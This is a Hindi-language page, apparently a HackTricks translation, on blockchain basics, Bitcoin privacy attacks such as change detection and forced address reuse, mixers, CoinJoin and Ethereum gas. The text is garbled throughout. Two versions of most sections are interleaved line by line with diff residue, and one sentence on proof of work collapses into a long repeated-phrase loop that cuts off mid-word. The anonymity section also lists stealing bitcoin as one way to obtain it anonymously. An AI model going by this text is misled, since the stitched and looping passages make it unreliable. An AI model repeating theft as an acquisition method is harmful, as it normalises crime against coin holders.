* **स्मार्ट कॉन्ट्रैक्ट**: स्मार्ट कॉन्ट्रैक्ट्स बेसिकली **ब्लॉकचेन पर स्टोर किए गए प्रोग्राम हैं जो निश्चित स्थितियों को पूरा होने पर चलते हैं**। वे सामान्यत: **एक समझौते** के **क्रियान्वयन** को स्वचालित करने के लिए उपयोग किए जाते हैं ताकि सभी सहभागियों को परिणाम के बारे में तुरंत पता चल सके, किसी मध्यस्थ की सहायता या समय की हानि के बिना। (से [यहाँ](https://www.ibm.com/topics/smart-contracts)). - **स्मार्ट कॉन्ट्रैक्ट्स** को उन कार्यक्रमों के रूप में परिभाषित किया जाता है जो ब्लॉकचेन पर कार्रवाई करते हैं जब कुछ शर्तें पूरी होती हैं, बिचौलियों के बिना समझौते की कार्रवाई को स्वचालित करना।
* मूल रूप से, एक स्मार्ट कॉन्ट्रैक्ट एक **कोड का टुकड़ा** है जो लोग जब उन्हें अनुबंध तक पहुंचते हैं तो क्रियान्वित होगा। स्मार्ट कॉन्ट्रैक्ट्स **ब्लॉकचेन में चलते हैं** (इसलिए परिणाम स्थायी रूप से स्टोर होते हैं) और लोग उन्हें स्वीकार करने से पहले पढ़ सकते हैं। - **डीसेंट्रलाइज्ड एप्लिकेशन्स (dApps)** स्मार्ट कॉन्ट्रैक्ट्स पर आधारित होते हैं, जिनमें एक उपयोगकर्ता-मित्रपूर्ण फ्रंट-एंड और एक पारदर्शी, जांचने योग्य बैक-एंड होता है।
* **डीएपी**: **डेसेंट्रलाइज्ड एप्लिकेशन** स्मार्ट कॉन्ट्रैक्ट्स के ऊपर लागू होते हैं। उनके पास एक फ्रंट-एंड होता है जहां उपयोगकर्ता एप्लिकेशन के साथ बातचीत कर सकते हैं, **बैक-एंड** सार्वजनिक होता है (ताकि इसे मूल्यांकन किया जा सके) और एक **स्मार्ट कॉन्ट्रैक्ट** के रूप में लागू किया जाता है। कभी-कभी डेटाबेस का उपयोग आवश्यक होता है, एथेरियम ब्लॉकचेन हर खाते को निश्चित संग्रह आवंटित करता है। - **टोकन और सिक्के** अंतर करते हैं जहां सिक्के डिजिटल धन के रूप में काम करते हैं, जबकि टोकन विशेष संदर्भों में मूल्य या स्वामित्व को दर्शाते हैं।
* **टोकन और सिक्के**: एक **सिक्का** एक क्रिप्टोकरेंसी है जो **डिजिटल** **पैसे** के रूप में काम करता है और एक **टोकन** कुछ **मूल्य** का प्रतिनिधित्व करता है लेकिन यह एक सिक्का नहीं है। - **यूटिलिटी टोकन्स** सेवाओं तक पहुंचने की अनुमति देते हैं, और **सिक्योरिटी टोकन्स** संपत्ति के स्वामित्व को दर्शाते हैं।
* **यूटिलिटी टोकन्स**: ये टोकन उपयोगकर्ता को **बाद में कुछ सेवा तक पहुंचने** की अनुमति देते हैं (यह किसी विशिष्ट वातावरण में कुछ मूल्य वाली चीज है)। - **डीफाई** का मतलब है डीसेंट्रलाइज्ड फाइनेंस, जो केंद्रीय प्राधिकरणों के बिना वित्तीय सेवाएं प्रदान करता है।
* **सुरक्षा टोकन्स**: ये **स्वामित्व** या किसी संपत्ति का प्रतिनिधित्व करते हैं। - **डीईएक्स** और **डीएओएस** डीसेंट्रलाइज्ड एक्सचेंज प्लेटफॉर्म और डीसेंट्रलाइज्ड ऑटोनोमस ऑर्गनाइजेशन्स को संदर्भित करते हैं।
* **डीफाई**: **डेसेंट्रलाइज्ड फाइनेंस**
* **डीईएक्स: डेसेंट्रलाइज्ड एक्सचेंज प्लेटफॉर्म्स**
* **डीएओएस**: **डेसेंट्रलाइज्ड ऑटोनोमस ऑर्गनाइजेशन्स**
# सहमति तंत्र ## सहमति तंत्र
एक ब्लॉकचेन लेनदारी को मान्य करने के लिए, इसे **ब्लॉकचेन** में **जोड़ना** होगा। मान्यकर्ता (खान संचालक) इस जोड़ने का कार्य करते हैं; अधिकांश प्रोटोकॉल में, वे इसे करने के लिए **पुरस्कार प्राप्त** करते हैं। ब्लॉकचेन को सुरक्षित रखने के लिए, इसे **एक दुर्भाग्यपूर्ण उपयोगकर्ता या समूह से बड़ी संख्या में मान्यता प्राप्त करने से रोकने का एक तंत्र होना चाहिए** सहमति तंत्र सुनिश्चित करते हैं और ब्लॉकचेन पर सुरक्षित और स्वीकृत लेन-देन की पुष्टि करते हैं:
- **प्रूफ ऑफ वर्क (PoW)** लेन-देन सत्यापन के लिए कंप्यूटेशनल पावर पर निर्भर होता है।
- **प्रूफ ऑफ स्टेक (PoS)** वैधकों से निश्चित मात्रा में टोकन रखने की मांग करता है, जो PoW की तुलना में ऊर्जा खपत को कम करता है।
प्रूफ ऑफ वर्क, एक और सामान्यत: उपयोग किया जाने वाला सहमति तंत्र, सौजन्य की मान्यता की जांच के लिए गणना क्षमता की मान्यता का उपयोग करता है, जिसमें एक संभावित हमलावर को वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वै ## बिटकॉइन महत्वपूर्ण अंश
```
### लेन-देन
बिटकॉइन लेन-देन में प्रायोजित धन के बीच फंड ले जाने की शामिल होती है। लेन-देन डिजिटल हस्ताक्षरों के माध्यम से सत्यापित की जाती है, सुनिश्चित करती है कि केवल निजी कुंजी के मालिक ही स्थानांतरण प्रारंभ कर सकता है।
#### मुख्य घटक:
- **मल्टीसाइनेचर लेन-देन** को एक लेन-देन की अधिक संकेतन की आवश्यकता होती है। लेन-देन में **इनपुट्स** (फंड का स्रोत), **आउटपुट्स** (गंतव्य), **शुल्क** (खनिजों को दिया जाता है), और **स्क्रिप्ट्स** (लेन-देन नियम) शामिल होते हैं।
### लाइटनिंग नेटवर्क
बिटकॉइन की स्कैलेबिलिटी को बढ़ाने का उद्देश्य एक चैनल के भीतर एकाधिक लेन-देन की अनुमति देना है, केवल अंतिम स्थिति को ब्लॉकचेन पर प्रसारित करने के लिए।
## बिटकॉइन गोपनीयता चिंताएँ
गोपनीयता हमले, जैसे कि **सामान्य इनपुट स्वामित्व** और **यूटीएक्सओ चेंज एड्रेस डिटेक्शन**, लेन-देन पैटर्न का शोषण करते हैं। **मिक्सर्स** और **कॉइनजॉइन** जैसी रणनीतियाँ उपयोगकर्ताओं के बीच लेन-देन के लिंक को अस्पष्ट करके गोपनीयता को बेहतर बनाती हैं।
## बिटकॉइन गोपनीयता हमले
# बिटकॉइन गोपनीयता हमलों का सारांश
बिटकॉइन के विश्व में, लेन-देनों की गोपनीयता और उपयोगकर्ताओं की गुमनामी अक्सर चिंता के विषय होते हैं। यहाँ कुछ सामान्य विधियाँ हैं जिनके माध्यम से हमलावर बिटकॉइन गोपनीयता को कमजोर कर सकते हैं।
## **सामान्य इनपुट स्वामित्व मान्यता**
सामान्य रूप से विभिन्न उपयोगकर्ताओं के इनपुट एक ही लेन-देन में मिलाए जाने की कठिनाई के कारण, **एक ही लेन-देन में दो इनपुट पते अक्सर एक ही मालिक के होने का माना जाता है**
## **यूटीएक्सओ चेंज एड्रेस डिटेक्शन**
एक यूटीएक्सओ, या **अनस्पेंट ट्रांजैक्शन आउटपुट**, को एक लेन-देन में पूरी तरह से खर्च किया जाना चाहिए। अगर इसमें से केवल एक हिस्सा किसी अन्य पते पर भेजा जाता है, तो शेष नये चेंज एड्रेस पर जाता है। दर्शक इस नए पते को भेजने वाले का मानते हैं, जिससे गोपनीयता को खतरे में डाला जाता है।
### उदाहरण
```bash
2 btc --> 4 btc 2 btc --> 4 btc
3 btc 1 btc 3 btc 1 btc
``` ```
मानते हैं कि उत्पादों में से एक चेंज है और दूसरा उत्पाद भुगतान है। दो व्याख्यान हैं: भुगतान उत्पाद या 4 BTC उत्पाद है या 1 BTC उत्पाद है। लेकिन अगर 1 BTC उत्पाद भुगतान राशि है तो 3 BTC इनपुट अनावश्यक है, क्योंकि वॉलेट केवल 2 BTC इनपुट खर्च कर सकती थी और इसे करने के लिए कम माइनर शुल्क भुगत सकती थी। यह एक संकेत है कि वास्तविक भुगतान उत्पाद 4 BTC है और 1 BTC चेंज उत्पाद है। ## **बाध्य पता पुनः उपयोग**
यह वह समस्या है जिसके लिए लेनदार अधिक से अधिक इनपुट होते हैं। इस लीक को ठीक करने का एक तरीका यह है कि चेंज उत्पाद किसी भी इनपुट से अधिक होने तक अधिक इनपुट जोड़ें, उदाहरण के लिए: हमलावार छोटी राशि पहले से उपयोग किए गए पतों पर भेज सकते हैं, आशा है कि प्राप्तकर्ता भविष्य की लेन-देन में इन्हें अन्य इनपुट के साथ मिला देता है, जिससे पते को एक साथ जोड़ा जा सकता है।
```
2 btc --> 4 btc
3 btc 6 btc
5 btc
```
## मजबूर पता पुनरउपयोग
**मजबूर पता पुनरउपयोग** या **प्रोत्साहित पता पुनरउपयोग** एक प्रकार की है जब एक प्रतिकूल व्यक्ति ब्लॉक श्रृंखला पर पहले से ही उपयोग किए गए पतों को बिटकॉइन की एक (अक्सर छोटी) राशि देता है। दुश्मन उम्मीद करता है कि उपयोगकर्ता या उनका वॉलेट सॉफ्टवेयर **भुगतान को एक बड़े लेन-देन के लिए इनपुट के रूप में उपयोग करेगा जिससे सामान्य-इनपुट-स्वामित्व** नियमानुसार अन्य पतों को प्रकट करेगा। ये भुगतान अप्रत्याशित पता पुनरउपयोग में पता मालिक को मनोबलित पता पुनरउपयोग के रूप में समझा जा सकता है। ### सही वॉलेट व्यवहार
इस गोपनीयता लीक को रोकने के लिए वॉलेट को खाली पतों पर प्राप्त किए गए सिक्कों का उपयोग न करना चाहिए।
यह हमला कभी-कभी गलती से **धूल अटैक** कहलाता है। ## **अन्य ब्लॉकचेन विश्लेषण तकनीकें**
वॉलेट्स द्वारा सही व्यवहार यह है कि खाली पतों पर जमी मुद्रा को खर्च न करें। - **सटीक भुगतान राशियाँ:** परिवर्तन के बिना लेन-देन संभावित रूप से एक ही उपयोगकर्ता द्वारा स्वामित्व में होती हैं।
- **गोल नंबर:** एक लेन-देन में गोल नंबर एक भुगतान का सुझाव देता है, जिसमें गोल आउटपुट संभावित रूप से परिवर्तन होता है।
- **वॉलेट फिंगरप्रिंटिंग:** विभिन्न वॉलेट्स के अद्वितीय लेन-देन निर्माण पैटर्न होते हैं, जो विश्लेषकों को सॉफ़्टवेयर का पहचान करने और संभावित रूप से परिवर्तन पता करने की अनुमति देते हैं।
- **राशि और समय संबंध:** लेन-देन के समय या राशियों का खुलासा करना लेन-देन को ट्रेसेबल बना सकता है।
## अन्य ब्लॉकचेन विश्लेषण ## **ट्रैफिक विश्लेषण**
* **सटीक भुगतान राशियाँ**: परिवर्तन के साथ लेन-देन से बचने के लिए, भुगतान को UTXO के बराबर होना चाहिए (जो अत्यधिक अपेक्षित है)। इसलिए, एक **भुगतान जिसमें कोई परिवर्तन पता नहीं है, संभावित रूप से एक ही उपयोगकर्ता के 2 पतों के बीच स्थानांतरण है** नेटवर्क ट्रैफिक का मॉनिटरिंग करके हमलावर लेन-देन या ब्लॉक को आईपी पतों से जोड़ सकते हैं, उपयोगकर्ता गोपनीयता को कमजोर करते हैं। यह विशेष रूप से सत्य है अगर कोई संस्था कई बिटकॉइन नोड चलाती है, जिससे उनकी लेन-देन की मॉनिटरिंग क्षमता बढ़ जाती है।
* **गोल नंबर**: एक लेन-देन में, यदि आउटपुट में से एक "**गोल नंबर**" है, तो यह उचित है कि यह एक **इंसान को भुगतान करने के लिए जो उसने वह** "गोल नंबर" **मूल्य** डाला है, इसलिए अन्य हिस्सा बचा होना चाहिए।
* **वॉलेट फिंगरप्रिंटिंग:** एक सावधान विश्लेषक कभी-कभी यह निर्धारित कर सकता है कि कौन सा सॉफ्टवेयर किस लेन-देन को बनाया, क्योंकि **कई विभिन्न वॉलेट सॉफ्टवेयर हमेशा बिल्कुल एक ही तरीके से लेन-देन नहीं करते**। वॉलेट फिंगरप्रिंटिंग का उपयोग परिवर्तन आउटपुट का पता लगाने के लिए किया जा सकता है क्योंकि एक परिवर्तन आउटपुट वह है जिसे एक ही वॉलेट फिंगरप्रिंट के साथ खर्च किया गया है।
* **राशि और समय संबंध**: यदि व्यक्ति जिसने लेन-देन किया है **समय** और/या **राशि** का खुलासा करता है, तो इसे आसानी से **खोजा जा सकता है**
## ट्रैफिक विश्लेषण ## अधिक
गोपनीयता हमलों और रक्षाओं की व्यापक सूची के लिए [बिटकॉइन गोपनीयता पर बिटकॉइन विकि](https://en.bitcoin.it/wiki/Privacy) पर जाएं।
कुछ संगठन **आपके ट्रैफिक को स्निफ करते** हुए आपको बिटकॉइन नेटवर्क में संचार करते हुए देख सकते हैं।\ ```plaintext
यदि प्रतिकूल एक लेन-देन या ब्लॉक देखता है **जो आपके नोड से निकल रहा है जिससे पहले नहीं आया था**, तो यह निश्चितता के साथ जान सकता है कि **लेन-देन आपके द्वारा किया गया था या ब्लॉक आपके द्वारा खनित हुआ था**। इंटरनेट कनेक्शन शामिल होने के कारण, प्रतिकूल व्यक्ति को खोजने में सक्षम होगा कि खोजे गए बिटकॉइन सूचना के साथ IP पता को जोड़ सकता है।
एक हमलावर जो सभी इंटरनेट ट्रैफिक को स्निफ नहीं कर सकता है लेकिन जिसके पास **बहुत सारे बिटकॉइन नोड** होते हैं ताकि वह **स्रोतों के करीब रह सके**, वह जान सकता है कि कौन से IP पते लेन-देन या ब्लॉक की घोषणा कर रहे हैं।\
इसके अलावा, कुछ वॉलेट समय-समय पर अपुष्ट लेन-देन को फिर से प्रसारित करते हैं ताकि वे नेटवर्क में व्यापक रूप से प्रसारित होने और खनित होने की अधिक संभावना हो।
## पतों के मालिक के बारे में जानकारी प्राप्त करने के लिए अन्य हमले
अधिक हमलों के लिए पढ़ें [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy)
# अनाम बिटकॉइन
## बिटकॉइन गुमनामता से प्राप्त करना
* **नकद व्यापार:** नकद का उपयोग करके बिटकॉइन खरीदें।
* **नकद के समर्थक:** गिफ्ट कार्ड या समान क्रय करें और उन्हें ऑनलाइन बिटकॉइन के लिए विनिमय करें।
* **खनन:** खनन बिटकॉइन प्राप्त करने का सबसे गुमनाम तरीका है। यह सोलो-खनन के लिए लागू है क्योंकि [खनन पूल](https://en.bitcoin.it/wiki/Pooled\_mining) आम तौर पर हैशर का IP पता जानते हैं।
* **चोरी:** सिद्धांत में एक और गुमनाम तरीका बिटकॉइन प्राप्त करने का यह है कि उन्हें चुराया जाए।
## मिक्सर
एक उपयोगकर्ता **मिक्सिंग सेवा को बिटकॉइन भेजेगा** और सेवा **उपयोगकर्ता को विभिन्न बिटकॉइन वापस भेजेगी**, एक शुल्क कम करके। सिद्धांत में, ब्लॉकचेन को अवलोकन करने वाला दुश्मन **आने वाले और जाने वाले लेन-देन को जोड़ने में असमर्थ होगा**
हालांकि, उपयोगकर्ता को मिक्सिंग सेवा पर भरोसा करना होगा कि वह बिटकॉइन वापस करेगी और यह भी नहीं रिकॉर्ड सहेज रही है कि पैसे प्राप्त और भेजे गए धन के बीच संबंधों के बारे में।\
कुछ अन्य सेवाएं भी मिक्सर के रूप में उपयोग की जा सकती हैं, जैसे बिटकॉइन कैसीनो जहां आप बिटकॉइन भेज सकते हैं और बाद में उन्हें पुनः प्राप्त कर सकते हैं।
## कॉइनजॉइन
**कॉइनजॉइन** एक उपयोगकर्ताओं के कई लेन-देन को केवल एक में मिलाएगा ताकि एक अवलोकक को पता लगाना अधिक **कठिन** हो जिस इनपुट किस आउटपुट से संबंधित है।\
यह एक नई स्तर की गोपनीयता प्रदान करता है, हालांकि, **कुछ** **लेन-देन** जहां कुछ इनपुट और आउटपुट राशियाँ संबंधित हैं या बाकी इनपुट और आउटपुट से बहुत अलग हैं **बाहरी अवलोकक द्वारा संबंधित हो सकते हैं**
बिटकॉइन की ब्लॉकचेन पर (संभावित) कॉइनजॉइन लेन-देन आईडी के उदाहरण हैं `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` और `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`
[**https://coinjoin.io/en**](https://coinjoin.io/en)\
**कॉइनजॉइन के लिए समान लेकिन बेहतर और एथीरियम के लिए आपके पास** [**ट
```
2 btc --> 3 btc 2 btc --> 3 btc
5 btc 4 btc 5 btc 4 btc
``` ```
# बिटकॉइन गोपनीयता अच्छी प्रथाएं Transactions जैसे ऊपर कर सकते हैं PayJoin, गोपनीयता को बढ़ावा देते हुए सामान्य बिटकॉइन लेन-देन से असंवेदनशील रह सकते हैं।
## वॉलेट समक्रमण **PayJoin का उपयोग पारंपरिक निगरानी विधियों को काफी व्यवधान कर सकता है**, यह लेन-देनीय गोपनीयता की पुरस्कृति में एक आशाजनक विकास है।
बिटकॉइन वॉलेट को अपने शेष और इतिहास के बारे में जानकारी कैसे प्राप्त करनी चाहिए। देर से 2018 के अनुसार सबसे व्यावहारिक और निजी मौजूदा समाधान हैं एक **पूर्ण नोड वॉलेट** (जो अधिकतम निजी है) और **क्लाइंट-साइड ब्लॉक फ़िल्टरिंग** (जो बहुत अच्छा है)। # क्रिप्टोकरेंसी में गोपनीयता के लिए सर्वोत्तम प्रथाएं
* **पूर्ण नोड:** पूर्ण नोड पूरे ब्लॉकचेन को डाउनलोड करते हैं जिसमें बिटकॉइन में हुए हर ऑन-चेन [लेन-देन](https://en.bitcoin.it/wiki/Transaction) शामिल है। इसलिए एक प्रतिकूल उपयोगकर्ता की इंटरनेट कनेक्शन को देख रहे शत्रु को यह पता नहीं चलेगा कि उपयोगकर्ता किस लेन-देन या पतों में रुचि रखता है। ## **वॉलेट समक्रमण तकनीकें**
* **क्लाइंट-साइड ब्लॉक फ़िल्टरिंग:** क्लाइंट-साइड ब्लॉक फ़िल्टरिंग काम करता है जिसमें **फ़िल्टर** बनाए जाते हैं जो ब्लॉक में हर लेन-देन के सभी **पते** को शामिल करते हैं। फ़िल्टर यह जांच सकते हैं कि क्या कोई **तत्व सेट में है**; गलत पॉजिटिव्स संभव हैं लेकिन गलत नेगेटिव्स नहीं। एक हल्का वॉलेट सभी ब्लॉक में अपने **पतों** के साथ मेल खाता है और इसके **पास** **पते** के मिलान की जांच करता है। मिलान वाले निर्देशिका से वह ब्लॉक पूरे डाउनलोड करेगा, और उन ब्लॉक का उपयोग वॉलेट के इतिहास और वर्तमान शेष को प्राप्त करने के लिए किया जाएगा।
## टॉर गोपनीयता और सुरक्षा बनाए रखने के लिए वॉलेट को ब्लॉकचेन के साथ समक्रमित करना महत्वपूर्ण है। दो विधियाँ उभरती हैं:
बिटकॉइन नेटवर्क एक पीर-टू-पीर नेटवर्क का उपयोग करता है, जिसका मतलब है कि अन्य पीयर आपका आईपी पता सीख सकते हैं। इसलिए यह सिफारिश की जाती है कि आप **बिटकॉइन नेटवर्क के साथ संवाद करना चाहते हैं तो हर बार टॉर के माध्यम से कनेक्ट करें** - **पूर्ण नोड**: पूर्ण नोड द्वारा पूरे ब्लॉकचेन को डाउनलोड करके, एक पूर्ण नोड गोपनीयता को अधिकतम सुनिश्चित करता है। सभी किए गए लेन-देन स्थानीय रूप से संग्रहीत होते हैं, जिससे प्रतिकूलकों को पहचानना असंभव हो जाता है कि उपयोगकर्ता किस लेन-देन या पतों में रुचि रखता है।
- **क्लाइंट-साइड ब्लॉक फ़िल्टरिंग**: यह विधि हर ब्लॉक के लिए फ़िल्टर बनाने का सम्मिलित करती है, जिससे वॉलेट नेटवर्क अवलोककर्ताओं को विशेष रुचियों को प्रकट किए बिना संबंधित लेन-देनों की पहचान कर सकते हैं। हल्के वॉलेट इन फ़िल्टर्स को डाउनलोड करते हैं, केवल जब उपयोगकर्ता के पतों के साथ मेल खाता है तो पूरे ब्लॉक्स को लाते हैं।
## पते का पुनः उपयोग न करना ## **गुप्तचरता के लिए Tor का उपयोग**
**पतों का अधिक से अधिक एक बार से अधिक उपयोग करना गोपनीयता के लिए बहुत हानिकारक है क्योंकि यह अधिक ब्लॉकचेन लेन-देन को जोड़ता है जिसमें यह साबित होता है कि वे एक ही एकाइ द्वारा बनाए गए थे**। बिटकॉइन का सबसे निजी और सुरक्षित तरीका यह है कि जो व्यक्ति आपको भुगतान करता है, उसे प्रत्येक व्यक्ति को एक नया पता भेजा जाए। प्राप्त किए गए सिक्के खर्च कर दिए जाने के बाद पता कभी भी फिर से उपयोग नहीं किया जाना चाहिए। साथ ही, जब बिटकॉइन भेजा जाए तो एक नया बिटकॉइन पता मांगा जाना चाहिए। सभी अच्छे बिटकॉइन वॉलेट में उपयोगकर्ता इंटरफेस होता है जो पते का पुनः उपयोग न करने की सलाह देता है। बिटकॉइन पीयर-टू-पीयर नेटवर्क पर काम करते हुए, Tor का उपयोग आपके आईपी पते को मास्क करने के लिए सिफारिश किया जाता है, जो नेटवर्क के साथ बातचीत करते समय गोपनीयता को बढ़ावा देता है।
## एकाधिक लेन-देन ## **पते का पुनः उपयोग रोकना**
**किसी को एक से अधिक ऑन-चेन लेन-देन के माध्यम से भुगतान करना राशि-आधारित गोपनीयता हमलों की शक्ति को बहुत कम कर सकता है जैसे कि राशि संबंध और गोल नंबर**। उदाहरण के लिए, यदि उपयोगकर्ता किसी को 5 BTC भुगतान करना चाहता है और उन्हें चाहिए कि 5 BTC मूल्य आसानी से खोजा न जा सके, तो वे 2 BTC और 3 BTC के मूल्य के लिए दो लेन-देन भेज सकते हैं जो मिलाकर 5 BTC के बराबर होते हैं। गोपनीयता की रक्षा के लिए, प्रत्येक लेन-देन के लिए एक नया पता उपयोग करना महत्वपूर्ण है। पते का पुनः उपयोग गोपनीयता को खतरे में डाल सकता है क्योंकि लेन-देनों को एक ही एकता से जोड़ सकता है। आधुनिक वॉलेट अपने डिज़ाइन के माध्यम से पते का पुनः उपयोग निषेध करते हैं।
## बदला टालना ## **लेन-देन गोपनीयता के लिए रणनीतियाँ**
बदला टालना एक ऐसी स्थिति है जहाँ लेन-देन के इनपुट और आउटपुट को ध्यान से चुना जाता है ताकि किसी भी बदला आउटपुट की आवश्यकता न हो। **किसी भी बदला आउटपुट का न होना गोपनीयता के लिए उत्कृष्ट है**, क्योंकि यह बदला पता लगाने के नियमों को तोड़ता है। - **एकाधिक लेन-देन**: एक भुगतान को कई लेन-देनों में विभाजित करना लेन-देन राशि को अस्पष्ट कर सकता है, गोपनीयता हमलों को नाकाम बना सकता है।
- **बदलाव टालना**: बदलाव की आवश्यकता न होने पर लेन-देन के लिए विकल्प चुनना गोपनीयता को बढ़ावा देता है जिससे बदलाव की पहचान की विधियों को विघटित किया जा सकता है।
- **एकाधिक बदलाव आउटपुट्स**: यदि बदलाव टालना संभव नहीं है, तो एकाधिक बदलाव आउटपुट्स उत्पन्न करना भी गोपनीयता में सुधार कर सकता है।
## एकाधिक बदला आउटपुट # **मोनेरो: एक गुप्तचरता का प्रकाश**
यदि बदला टालना एक विकल्प नहीं है तो **एक से अधिक बदला आउटपुट बनाने से गोपनीयता में सुधार हो सकता है**। यह भी बदला पता लगाने के नियमों को तोड़ता है जो सामान्यत: केवल एकल बदला आउटपुट होने का अनुमान करते हैं। जैसा कि यह विधि सामान्य से अधिक ब्लॉक स्थान का उपयोग करती है, बदला टालना अधिक अच्छा है। मोनेरो डिजिटल लेन-देनों में पूर्ण गुप्तचरता की आवश्यकता को संबोधित करता है, गोपनीयता के लिए एक उच्च मानक स्थापित करता है।
# मोनेरो # **इथेरियम: गैस और लेन-देन**
जब मोनेरो विकसित किया गया था, तो पूरी गोपनीयता की आवश्यकता थी जिसे यह हल करने का प्रयास किया गया था, और बड़े हिस्से में, यह उस शून्यता को भर दिया है। ## **गैस को समझना**
# इथेरियम इथेरियम पर ऑपरेशन को कार्यान्वित करने के लिए आवश्यक गणना प्रयास को गैस मापता है, **ग्वेई** में मूल्यांकन किया जाता है। उदाहरण के लिए, 2,310,000 ग्वेई (या 0.00231 ईथ) का लेन-देन एक गैस सीमा और एक मूल शुल्क के साथ होता है, जिसमें खननकर्ताओं को प्रोत्साहित करने के लिए एक टिप शामिल है। उपयोगकर्ता अधिक शुल्क न देने के लिए एक अधिकतम शुल्क सेट कर सकते हैं, अतिरिक्त राशि को वापस कर देते हैं।
## गैस ## **लेन-देन कार्यान्वयन**
गैस उनिट को सूचित करता है जो इथेरियम नेटवर्क पर विशेष ऑपरेशन को कार्यान्वित करने के लिए आवश्यक गणनात्मक प्रयास की मात्रा को मापता है। गैस इथेरियम पर एक लेन-देन सफलतापूर्वक करने के लिए आवश्यक शुल्क को सूचित करता है इथेरियम में लेन-देन में एक भेजने वाला और एक प्राप्तकर्ता शामिल होते हैं, जो या तो उपयोगकर्ता हो सकते हैं या स्मार्ट कॉन्ट्रैक्ट पते हो सकते हैं। इन्हें एक शुल्क की आवश्यकता होती है और खनन किए जाने चाहिए। लेन-देन में महत्वपूर्ण जानकारी में प्राप्तकर्ता, भेजने वाले के हस्ताक्षर, मूल्य, वैकल्पिक डेटा, गैस सीमा, और शुल्क शामिल हैं। विशेष रूप से, भेजने वाले का पता हस्ताक्षर से निकाला जाता है, जिससे लेन-देन डेटा में इसकी आवश्यकता नहीं होती
गैस मूल्य को **ग्वेई** में दर्शाया जाता है, जो खुद इथ का एक मापन है - प्रत्येक ग्वेई 0.000000001 इथ (10-9 इथ) के बराबर है। उदाहरण के लिए, यदि आपका गैस 0.000000001 इथ है, तो आप कह सकते हैं कि आपका गैस 1 ग्वेई का है। 'ग्वेई' शब्द खुद में 'गिगा-वेई' का अर्थ है, और यह 1,000,000,000 वेई के बराबर है। वेई खुद इथ की **सबसे छोटी इकाई** है ये प्रथाएँ और तंत्र उन सभी लोगों के लिए मौलिक हैं जो क्रिप्टोकरेंसी के साथ संलग्न होने की दृष्टि से गोपनीयता और सुरक्षा को प्राथमिकता देते हैं
एक लेन-देन की गैस की गणना करने के लिए इस उदाहरण को पढ़ें: ## संदर्भ
मान लें कि जॉर्डन को टेलर को 1 इथ देना है। लेन-देन में गैस सीमा 21,000 इकाइयाँ हैं और बेस शुल्क 100 ग्वेई है। जॉर्डन ने 10 ग्वेई की टिप शामिल की है। * [https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof\_of\_stake)
* [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/)
ऊपर दिए गए सूत्र का उपयोग करके हम इसे गणना कर सकते हैं `21,000 * (100 + 10) = 2,310,000 ग्वेई` या 0.00231 इथ। * [https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions](https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions)
* [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/)
जब जॉर्डन पैसे भेजता है, तो 1.00231 इथ जॉर्डन के खाते से कटा जाएगा। टेलर को 1.0000 इथ क्रेडिट किया जाएगा। खननकर्ता को 0.00021 इथ की टिप मिलेगी। 0.0021 इथ का बेस शुल्क जला दिया जाएगा। * [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/)
* [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced\_address\_reuse)
इसके अतिरिक्त, जॉर्डन लेन-देन के लिए एक अधिकतम शुल्क (`maxFeePer

View file

@ -1,29 +1,30 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
